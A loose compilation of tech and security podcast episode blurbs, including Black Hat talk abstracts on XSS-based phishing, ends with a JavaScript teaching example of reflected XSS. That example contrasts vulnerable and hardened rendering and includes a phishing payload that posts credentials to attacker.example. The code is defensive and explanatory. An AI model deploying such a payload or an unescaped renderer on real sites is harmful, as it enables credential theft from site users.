Cast: Ahmani and Aaron
Spoiler Cast: Ahmani and Pele
Topics: Sanctum 2 / Son of the forest / Pokemon DnD / John Wick chapter 4 / Diablo 4 beta / News
Oh, great! Zoom has announced a 40-minute call limit for one-on-one meetings starting this month. In this episode, Amit and Chris discuss this news and several affordable alternatives available to you when you're meeting with students. Links: * [Original Story on BetaNews](https://betanews.com/2022/04/26/zoom-is-slashing-the-length-of-free-1-on-1-meetings-from-may/) * [Apps for Authors](https://writing.fyi/apps) * [New Zenler](https://www.newzenler.com/invite/zmnfZZ) * [5K Course Launch Blueprint](https://getnzlr.com/5k-launch-blueprint/)
Patrick Emerson, director of IT from New Springs Church, joins us to talk about their migration from their proprietary walled-garden network and storage to free and open source options.

-- During The Show --

00:55 VPS that accepts physical cash? - Charlie Brown
* Host that accepts cryptocurrency
* Pre-paid credit card

05:30 User Responds to Ventoy - Chris
* Ineo M.2 NVMe Enclosure Affiliate Link (http://www.amazon.com/dp/B0827PB71G/?tag=minddripmedia-20)
* IODD 2531 Affiliate Link (http://www.amazon.com/dp/B00TDJ4BJU/?tag=minddripmedia-20)
* IODD 2541 Affiliate Link (http://www.amazon.com/dp/B00S3G12E6/?tag=minddripmedia-20)
* Japanese chat
* Giveaway - write in your war story where one of these would have saved you

09:50 Firefox Audio Response - Cory
* Restart in safe mode (no need to disable add-ons)

11:30 Firefox Audio Feedback - Matthew
* CLI Command: flatpak install org.freedesktop.Platform.ffmpeg-full/x86_64/20.08

12:20 Managing Documents Response - Jordan
* Open Paper (https://openpaper.work/en/)

14:40 Pick of the Week
* Easy WSL turns Docker containers into WSL distros
* EasyWSL GitHub (https://github.com/redcode-labs/easyWSL)
* TechRadar (https://www.techradar.com/sg/news/this-new-tool-converts-pretty-much-any-linux-docker-image-into-a-wsl-distro)

15:50 Kodi / LibreELEC Available
* Kodi - Media Player App
* LibreELEC 10 - Distribution
* IR Remote Affiliate Link (http://www.amazon.com/dp/B00M4I1BAY/?tag=minddripmedia-20)
* Nvidia Shield spams ads
* LibreELEC 10 has a few bugs
* Kodi.tv (https://kodi.tv/)
* BetaNews (https://betanews.com/2021/08/27/kodi-19-matrix-libreelec-10-linux/)

24:25 Kernel 5.14 Released
* Secret Memory Areas
* Hot-Unplug AMD Radeon Cards
* New/Improved Hardware Support: Xbox One Controller, Raspberry Pi 400, Dell Hardware Kill-Switches, Low Latency USB driver
* OMG Ubuntu (https://www.omgubuntu.co.uk/2021/08/linux-kernel-5-14-new-features)

26:10 Patrick Emerson Interview
* Director of IT
* 5,000-7,000 Attendees
* New Spring (https://www.newspring.org)
* Came into everything falling apart
* Sophos router was undocumented and out of date
* Sophos wanted $300/hr to help
* 1.4 TB of video created per week
* Typical week's work
* Screenly (https://www.screenly.io/)
* Bought 2 pfSense routers
* D-Day (things fell apart)
* Sophos freaked out and died
* Have someone looking over your shoulder to double check things
* Windows requires DHCP relay to be turned on when being used as a DHCP server
* Add an "unknown to internet allow" rule
* pfSense and OPNsense UI make networking clear
* Future network planning
* Dell Servers with direct access to the drives
* iXsystems (https://www.ixsystems.com/)
* 45 Drives (https://www.45drives.com/)

-- The Extra Credit Section --
For links to the articles and material referenced in this week's episode check out this week's page from our podcast dashboard!
This Episode's Podcast Dashboard (http://podcast.asknoahshow.com/248)
Phone Systems for Ask Noah provided by Voxtelesys (http://www.voxtelesys.com/asknoah)
Join us in our dedicated chatroom #GeekLab:linuxdelta.com on Matrix (https://element.linuxdelta.com/#/room/#geeklab:linuxdelta.com)

-- Stay In Touch --
Find all the resources for this show on the Ask Noah Dashboard
Ask Noah Dashboard (http://www.asknoahshow.com)
Need more help than a radio show can offer? Altispeed provides commercial IT services and they're excited to offer you a great deal for listening to the Ask Noah Show. Call today and ask about the discount for listeners of the Ask Noah Show!
Altispeed Technologies (http://www.altispeed.com/)
Contact Noah live [at] asknoahshow.com

-- Twitter --
Noah - Kernellinux (https://twitter.com/kernellinux)
Ask Noah Show (https://twitter.com/asknoahshow)
Altispeed Technologies (https://twitter.com/altispeed)

Special Guest: Steve Ovens.
Joe Gray @C_3PJoe OSINTION https://theosintion.com
New book… ship date? How to get it?
https://www.amazon.com/Practical-Social-Engineering-Joe-Gray/dp/171850098X/
https://nostarch.com/practical-social-engineering
"Gray provides a very accessible look at social engineering that should be essential reading for pentesters and ethical hackers." — Ian Barker, BetaNews
Story (Bryan: found my shipmate from the Navy)
Gathering OSINT (what is ethically too far?)
OSINT heartbeat
https://matrix.berkeley.edu/research-article/berkeley-protocol-open-source-investigations/
https://hunter.io/
https://halalgoogling.com/
The OSINTion Discord: https://discord.gg/p78TTGa
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com
#AmazonMusic: https://brakesec.com/amazonmusic
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: bds.podcast@gmail.com
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
This week we feature commentator Josh Centers, Managing Editor for TidBITS, and author of "Take Control of Apple TV" and other titles, who covers Apple's surprising release of a major update for the MacBook Pro. The refresh features 6-core processors, solid state drives as large as 4TB and up to 32GB RAM, twice as much as Apple has previously offered. Is this the professional notebook that many users have craved after expressing disappointment with the models offered over the past two years? Josh will also provide speculation about a possible future successor to the Mac, using an ARM-based CPU instead of Intel. Will this be a sort of convergence machine offering features derived from the iPad and Mac, or something altogether new? There will also be a discussion about health and fitness privacy, where Gene wonders if anyone would care if it got out that he's just shy of six feet one inch tall and weighs 178.5 pounds? In a special encore presentation, you'll also hear from tech columnist and former industry analyst Joe Wilcox, who writes for BetaNews. During this episode, Joe will explain why he regards Apple's Siri voice assistant as worse than Microsoft's Skype, despite all the connection glitches with the latter. Will hiring former Google executives help Apple make Siri more responsive and accurate, without sacrificing your security? You'll also hear about Google I/O and Android P, and about all those fake news reports that the iPhone X was unsuccessful. For two quarters straight, however, Apple reported that the iPhone X was not only its best selling smartphone for each week it was on sale, but the hottest selling smartphone on the planet. Gene shares his 20 years experience with the iMac, which began with the original Bondi Blue model that he beta tested for Apple as part of the former Customer Quality Feedback (CQF) program. You'll also hear about the Apple Watch and whether it makes sense for Apple to switch Macs from Intel to ARM CPUs.
This week, we invite you to meet Major General (Ret) Earl D. Matthews: He spent three decades at the nexus of big budgets and cybersecurity, including stints as Director, Cyberspace Operations and Chief Information Security Officer at HQ, U.S. Air Force, and VP for Enterprise Security Solutions at Hewlett-Packard. In his current role as Senior VP and Chief Strategy Officer at Verodin, Inc., he champions the concept of security instrumentation, a process that continuously validates the effectiveness of each security element in place. During this episode, he'll cover a gamut of cybersecurity issues that include the privacy issues at Facebook, the DNC hack, along with managing your personal privacy at a time when tens of millions of Americans have had their credit reports hacked. Major General Matthews will also reveal two episodes of ID theft that impacted his own family. You'll also hear from tech columnist and former industry analyst Joe Wilcox, who writes for BetaNews. During this episode, Joe will explain why he regards Apple's Siri voice assistant as worse than Microsoft's Skype, despite all the connection glitches with the latter. Will hiring former Google executives help Apple make Siri more responsive and accurate, without sacrificing your security? You'll also hear about Google I/O and Android P, and about all those fake news reports that the iPhone X was unsuccessful. For two quarters straight, however, Apple reported that the iPhone X was not only its best selling smartphone for each week it was on sale, but the hottest selling smartphone on the planet. Gene shares his 20 years experience with the iMac, which began with the original Bondi Blue model that he beta tested for Apple as part of the former Customer Quality Feedback (CQF) program. You'll also hear about the Apple Watch and whether it makes sense for Apple to switch Macs from Intel to ARM CPUs.
The dynamic duo Jonasson/Larsson are given free rein this week, as Mr. Söderlund, who is usually the man at the controls, has gone on a business trip to the other side of the world. Despite that, things stay reasonably tidy, and it is another week full of opinions. There is lively discussion about how we feel about beta versions of apps and operating systems as we report the results of last week's poll. We also take a closer look at the tracking Facebook subjects you, as a user, to on other websites, whether you are logged in or not. This and more is packed into this week's episode. Welcome!

From this week's content
Feedback: Why Vim uses the H, J, K and L keys for navigation; How do you do it (and why are you doing it wrong)?; Betanews
Topics: Facebook's tracking of non-users is illegal (again); Chrome's built-in ad blocker
Afterchat: We are taking part in this year's edition of Vetenskapsfestivalen; Live recording followed by a meetup!; Last year's recording from Vetenskapsfestivalen
Listen to roddar via Sonos, Pocket Casts, Castro, TuneIn
En podd om teknik: Website; Send feedback; Live chat; Buy our stylish t-shirt with EPOT print; Advertise with us; About us
Social media: En podd om teknik on Twitter; En podd om teknik on Facebook; En podd om teknik on Instagram; Jezper on Twitter; Johan on Twitter; Magnus on Twitter
We feature outspoken commentator/podcaster Peter Cohen. During this segment, Gene will discuss his efforts to get decent support from AT&T wireless, which involved multiple phone calls, and frustrating encounters with more than 20 different reps. Did he finally succeed? Gene and Peter will also discuss the prospects for new Mac notebooks at Apple's 2017 WWDC developer event in June. And what about Apple's decision to deliver subpar gaming performance on the Mac? As a former Macworld gaming columnist, Peter explains what is going on, and what he believes to be Apple's reasons for not paying attention to the needs of avid gamers. You'll also hear from independent tech journalist Joe Wilcox, who writes for BetaNews. This wide-ranging discussion will include Joe's observations about the quality of the four major wireless carriers in the U.S., as he explains the surprising result of his efforts to switch from one company to another to get better download speeds. Were there any notable announcements at the 2017 Google I/O conference in Mountain View, CA? Was it all about photos? What about the voice assistant platforms from Amazon, Apple and Google? Should Apple respond to the Amazon Echo with its own version? Gene and Joe will also talk about the prospects for new Mac notebooks at the WWDC, and is there a possibility that Apple will pull the plug on one of its three notebook models?
We feature tech journalist Josh Centers, Managing Editor for TidBITS, and author of "Take Control of Apple TV" and other titles. The discussion begins with Gene's strange story of the problems he encountered installing macOS Sierra on a 2010 17-inch MacBook Pro. The segment moves on to reports that Apple is giving the Mac short shrift, and whether such stories have any credibility. Josh brings up the question of whether innovation in the tech industry began to slow down after the death of Steve Jobs in 2011. Or is that just the way the industry was destined to evolve? You'll also hear from independent tech journalist Joe Wilcox, who writes for BetaNews. He'll tell the curious tale of the two Late 2016 MacBook Pros that he owns, and the battery life issues he has confronted on both. Yet when he gave one of those notebooks, the 13-inch model, to his wife and reconfigured it with her apps and settings, battery life was normal. What about the erratic battery life tests reported by Consumer Reports magazine, which decided not to recommend the new MacBook Pros? The discussion moves to the pressing topic of whether Apple's quality control has nosedived in recent years, as Gene cites the long-term problems with the macOS' "forgetful" Finder.
We feature outspoken blogger and podcaster Peter Cohen, who focuses on the questions raised about Apple's ongoing commitment to professional users. And what about published reports, since denied, that chief designer Sir Jonathan Ive may no longer be fully involved in developing new Apple gear? The discussion also includes the ousting of the manager of the automation division, home of AppleScript, Apple's decision to give up building its own displays, and the ever-controversial Late 2016 MacBook Pro, which features the contextual Touch Bar and a much higher price. You'll also hear from columnist Joe Wilcox, of BetaNews, who will explain why he prefers his new iPhone 7 Plus despite the fact that he finds some of Google's services, such as its voice assistant, to be superior. What should Apple be thankful for during the holiday season? Joe offers his opinions about his 13-inch MacBook Pro with Touch Bar, and also the impact of Google's Chromebook in American school systems, and whether its cheap price and focus on cloud-based apps makes it a better educational alternative. And what about Microsoft's controversial decision to force Windows 10 upgrades on users, and what about sharing telemetry data culled from users with third parties?
On this week's all-star episode, John Martellaro, Senior Editor, Analysis & Reviews for The Mac Observer, will discuss the recent appearance of Apple CEO Tim Cook at an AllThingsD event, and what he calls "Cook Code." He'll also talk about the tragic state of iPad magazines, operations research and tech warfare, and deliver an iPhone veteran's review of the Samsung Galaxy Note II "phablet." If you're in the market for a car, you'll want to hear from Dennis Miller, Founder and CEO of SNAFU Scan, an iOS and Android app that helps you check whether your car has been recalled by the manufacturer, and the ability to examine used car auction prices to see if your dealer is ripping you off on a trade. In our third segment, Joe Wilcox, Managing Editor of BetaNews, talks about his recent decision to move his wireless service from AT&T to T-Mobile, and proceeds to discuss what we might expect to see in Microsoft's Windows 8.1 update, and whether it can address some of the concerns about the original Windows 8 release.
On this week's all-star episode, we present Bryan Chaffin, co-founder and co-publisher of The Mac Observer, who will talk about Apple's large stash of cash and the taxman, plus other subjects, including T-Mobile's new marketing scheme that is intended to eliminate subsidized handsets. You'll also hear from Joe Wilcox, Managing Editor of BetaNews, who will talk about the increase in cyber attacks on major Web sites, including banks and other financial institutions, why he's switching his cellular service to T-Mobile, and other topics that include Samsung's impact on the Android platform.
On this week's all-star episode, commentator Joe Wilcox, Managing Editor of BetaNews, discusses the outcome of the Federal Trade Commission's probe into Google's search policies, and the verdict that addresses the patent licensing policies of Google's Motorola Mobility division. Joe will also discuss his article suggesting that Apple may have lost its stomach for industry-shaking revolutions of their product lines. You'll also hear from Avram Piltch, Online Editor Director of Laptop magazine, who will talk about the sort of product intros expected at the Consumer Electronics Show in Las Vegas, held the second week of January and express his ongoing concerns about the prospects for Windows 8.
On this week's all-star episode, tech journalist Rob Pegoraro, who writes for USA Today and other publications, covers such subjects as satellite Internet, broadband Internet performance, the possibilities for the iPad mini, the impending arrival of Windows 8 and the Microsoft Surface tablet. Joe Wilcox, Managing Editor of BetaNews, covers the Windows 8 issues, the introduction of the Surface tablet, and Apple's possible plans for the iPad mini and other expected new products.
We focus on some key announcements from Microsoft that have dominated tech news, such as the demonstration of a 10.6-inch tablet in two versions known as Surface, and the first announcement about the new features in Windows Phone 8. We'll also cover the potential and some of the key problems that have appeared in the forthcoming Windows 8 upgrade. Our guests include outspoken columnist and former industry analyst Joe Wilcox, from BetaNews, commentator Jim Dalrymple, Editor in Chief of The Loop, and Mike Prospero, Reviews Editor of Laptop magazine. We'll also cover Apple's amazing new MacBook Pro with Retina display, and its impact on the notebook market.
T-Mobile is hurting financially. Consumers increasingly face wireless carrier domination. Is there enough wireless competition in the U.S.? Would having greater competition reduce mobile charges and increase services? Some thoughts… Betanews has an interesting article about T-Mobile USA, its wireless competitors and Deutsche Telekom, TM’s parent corporation in Germany. Did you know that T-Mobile has […]
Black Hat Briefings, Japan 2005 [Audio] Presentations from the security conference
"The use of phishing/cross-site scripting (XSS) hybrid attacks for financial gain is spreading. It's imperative that security professionals familiarize themselves with these new threats to protect their websites and confidential corporate information. This isn't just another presentation about phishing scams or cross-site scripting. We're all very familiar with each of those issues. Instead, we'll discuss the potential impact when the two are combined to form new attack techniques. Phishers are beginning to exploit these techniques, creating new phishing attacks that are virtually impervious to conventional security measures. Secure sockets layer (SSL), blacklists, token-based authentication, browser same-origin policy, and monitoring / take-down services offer little protection. Even eyeballing the authenticity of a URL is unlikely to help. By leveraging cross-site scripting, the next level of phishing scams will be launched not from look-alike web pages, but instead from legitimate websites! This presentation will demonstrate how these types of attacks are being achieved. We'll also demonstrate the cutting edge exploits that can effectively turn your browser into spyware with several lines of JavaScript. And, we'll give you the steps you need to take to protect your websites from these attacks. Jeremiah Grossman is the founder and Chief Technology Officer of WhiteHat Security (http://www.whitehatsec.com), where he is responsible for web application security R&D and industry evangelism. As a seven-year industry veteran and well-known security expert, Mr. Grossman is a frequent international conference speaker at the Blackhat Briefings, ISSA, ISACA, NASA, and many other industry events. Mr. Grossman's research, writings, and discoveries have been featured in USA Today, VAR Business, NBC, ABC News (AU), ZDNet, eWeek, BetaNews, etc. Mr. 
Grossman is also a founder of the Web Application Security Consortium (WASC), as well as a contributing member of the Center for Internet Security Apache Benchmark Group. Prior to WhiteHat, Mr. Grossman was an information security officer at Yahoo!, responsible for performing security reviews on the company's hundreds of websites."
Black Hat Briefings, Las Vegas 2005 [Audio] Presentations from the security conference
The use of phishing/cross-site scripting hybrid attacks for financial gain is spreading. It's imperative that security professionals familiarize themselves with these new threats to protect their websites and confidential corporate information. This isn't just another presentation about phishing scams or cross-site scripting. We're all very familiar with each of those issues. Instead, we'll discuss the potential impact when the two are combined to form new attack techniques. Phishers are beginning to exploit these techniques, creating new phishing attacks that are virtually impervious to conventional security measures. Secure sockets layer (SSL), blacklists, token-based authentication, browser same-origin policy, and monitoring / take-down services offer little protection. Even eyeballing the authenticity of a URL is unlikely to help. By leveraging cross-site scripting, the next level of phishing scams will be launched not from look-alike web pages, but instead from legitimate websites! This presentation will demonstrate how these types of attacks are being achieved. We'll also demonstrate the cutting edge exploits that can effectively turn your browser into spyware with several lines of JavaScript. And, we'll give you the steps you need to take to protect your websites from these attacks. Jeremiah Grossman is the founder and Chief Technology Officer of WhiteHat Security (http://www.whitehatsec.com), where he is responsible for web application security R&D and industry evangelism. As a seven-year industry veteran and well-known security expert, Mr. Grossman is a frequent conference speaker at the BlackHat Briefings, ISSA, ISACA, NASA, and many other industry events. Mr. Grossman's research, writings, and discoveries have been featured in USA Today, VAR Business, NBC, ZDNet, eWeek, BetaNews, etc. Mr. 
Grossman is also a founder of the Web Application Security Consortium (WASC), as well as a contributing member of the Center for Internet Security Apache Benchmark Group. Prior to WhiteHat, Mr. Grossman was an information security officer at Yahoo!, responsible for performing security reviews on the company's hundreds of websites.
Black Hat Briefings, Las Vegas 2005 [Video] Presentations from the security conference
(Same abstract and speaker bio as the Black Hat Briefings, Las Vegas 2005 [Audio] listing above.)
Black Hat Briefings, Las Vegas 2006 [Audio] Presentations from the security conference
"Imagine you're visiting a popular website and invisible JavaScript exploit code steals your cookies, captures your keystrokes, and monitors every web page that you visit. Then, without your knowledge or consent, your web browser is silently hijacked to transfer out bank funds, hack other websites, or post derogatory comments in a public forum. No traces, no tracks, no warning sirens. In 2005's "Phishing with Superbait" presentation we demonstrated that all these things were in fact possible using nothing more than some clever JavaScript. And as bad as things are already, further web application security research is revealing that outsiders can also use these hijacked browsers to exploit intranet websites. Most of us assume while surfing the Web that we are protected by firewalls and isolated through private NAT'ed IP addresses. We assume the soft security of intranet websites and that the Web-based interfaces of routers, firewalls, printers, IP phones, payroll systems, etc. even if left unpatched, remain safe inside the protected zone. We believe nothing is capable of directly connecting in from the outside world. Right? Well, not quite. Web browsers can be completely controlled by any web page, enabling them to become launching points to attack internal network resources. The web browser of every user on an enterprise network becomes a stepping stone for intruders. Now, imagine visiting a web page that contains JavaScript malware that automatically reconfigures your company's routers or firewalls, from the inside, opening the internal network up to the whole world. Even worse, common Cross-Site Scripting vulnerabilities make it possible for these attacks to be launched from just about any website we visit and especially those we trust. The age of web application security malware has begun and it's critical that we understand what it is and how to defend against it. 
During this presentation we'll demonstrate a wide variety of cutting-edge web application security attack techniques and describe best practices for securing websites and users against these threats. You'll see: * Port scanning and attacking intranet devices using JavaScript * Blind web server fingerprinting using unique URLs * Discovering NAT'ed IP addresses with Java Applets * Stealing web browser history with Cascading Style Sheets * Best-practice defense measures for securing websites * Essential habits for safe web surfing Jeremiah Grossman is the founder and Chief Technology Officer of WhiteHat Security (http://www.whitehatsec.com), where he is responsible for web application security R&D and industry evangelism. As a well-known and internationally recognized security expert, Mr. Grossman is a frequent speaker at the Black Hat Briefings, ISSA, ISACA, NASA, and many other industry events. Mr. Grossman's research, writing, and interviews have been published in dozens of publications including USA Today, VAR Business, NBC, ABC News (AU), ZDNet, eWeek, Computerworld and BetaNews. Mr. Grossman is also a founder of the Web Application Security Consortium (WASC), as well as a contributing member of the Center for Internet Security Apache Benchmark Group. Prior to WhiteHat, Mr. Grossman was an information security officer at Yahoo!, responsible for performing security reviews on the company's hundreds of websites. T.C. Niedzialkowski is a Senior Security Engineer at WhiteHat Security in Santa Clara, California. In this role, he oversees WhiteHat Sentinel, the company's continuous vulnerability assessment and management service for web applications. Mr. Niedzialkowski has extensive experience in web application assessment and is a key contributor to the design of WhiteHat's scanning technology."
Black Hat Briefings, Las Vegas 2006 [Video] Presentations from the security conference
(Same abstract and speaker bios as the Black Hat Briefings, Las Vegas 2006 [Audio] listing above.)
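Both Black Hat abstracts above (the 2005 phishing/XSS hybrid talk and the 2006 intranet-hacking talk) rest on the same starting point: a cross-site scripting hole on a legitimate site lets an attacker's HTML or JavaScript run under that site's real origin, so SSL, the same-origin policy and a correct-looking URL give the victim nothing. The following is an added example written for this page, not code from the talks or from WhiteHat Security. It shows a reflected-XSS "search results" page in its vulnerable and hardened forms, a constructed phishing payload of the kind the 2005 talk describes (a login form injected into the real page), and the response headers a site would add today. The hostnames bank.example and attacker.example, the /search page and the session cookie name are assumptions for illustration; the Content-Security-Policy and cookie flags post-date the talks and are an addition here, not measures the abstracts list.

```javascript
// Added example: reflected XSS as the launching point for the attacks the two
// abstracts describe. Not code from the Black Hat talks or WhiteHat Security.
// bank.example, attacker.example, /search and the cookie name are assumptions.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Output-encode untrusted text for the HTML text and quoted-attribute contexts.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Vulnerable: the search term is concatenated straight into the markup, so a
// crafted link such as https://bank.example/search?q=<payload> makes the
// legitimate site serve the attacker's HTML under its own origin.
function renderSearchVulnerable(q) {
  return `<html><body><h1>Results for: ${q}</h1></body></html>`;
}

// Hardened: encode on output. The address bar, the certificate and the
// same-origin policy are all still "correct" in the vulnerable case; only the
// site's own encoding keeps the attacker's markup inert.
function renderSearchHardened(q) {
  return `<html><body><h1>Results for: ${escapeHtml(q)}</h1></body></html>`;
}

// Constructed phishing payload in the style of the 2005 talk: a login form
// injected into the real page, posting credentials to the attacker. The same
// injection point could carry the 2006 talk's JavaScript (intranet probing,
// history stealing) instead of a form.
const PHISH_PAYLOAD =
  '<form action="https://attacker.example/collect" method="post">' +
  'Your session has expired. Username: <input name="u"> ' +
  'Password: <input name="p" type="password"> ' +
  '<input type="submit" value="Sign in"></form>';

// Check used to compare the two renderers: does the page contain any tag that
// is not part of the template (html, body, h1)?
function containsInjectedMarkup(html) {
  const tags = html.match(/<\/?[a-z][^>]*>/gi) || [];
  return tags.some((t) => !/^<\/?(html|body|h1)>$/i.test(t));
}

// Defence in depth for the response (an addition here; these headers did not
// exist when the talks were given): a CSP that forbids inline script and forms
// posting off-origin, plus cookie flags that keep the session token out of
// document.cookie so injected script cannot read it.
function hardeningHeaders(sessionId) {
  return {
    'Content-Security-Policy':
      "default-src 'self'; script-src 'self'; form-action 'self'; base-uri 'self'",
    'Set-Cookie': `session=${sessionId}; Secure; HttpOnly; SameSite=Lax`,
  };
}

// Stand-alone demonstration.
console.log('vulnerable page carries injected markup:', containsInjectedMarkup(renderSearchVulnerable(PHISH_PAYLOAD)));
console.log('hardened page carries injected markup:  ', containsInjectedMarkup(renderSearchHardened(PHISH_PAYLOAD)));
console.log(hardeningHeaders('opaque-random-id'));
```

The point of the comparison is that nothing the victim can inspect differs between the two renderers: same hostname, same certificate, same origin. Encoding on output for the specific HTML context is the fix the 2005 abstract promises as "the steps you need to take"; the CSP and HttpOnly lines are the modern layer that limits what an injection can do if an encoding gap remains (form-action blocks the credential post, script-src blocks the inline JavaScript the 2006 talk relies on).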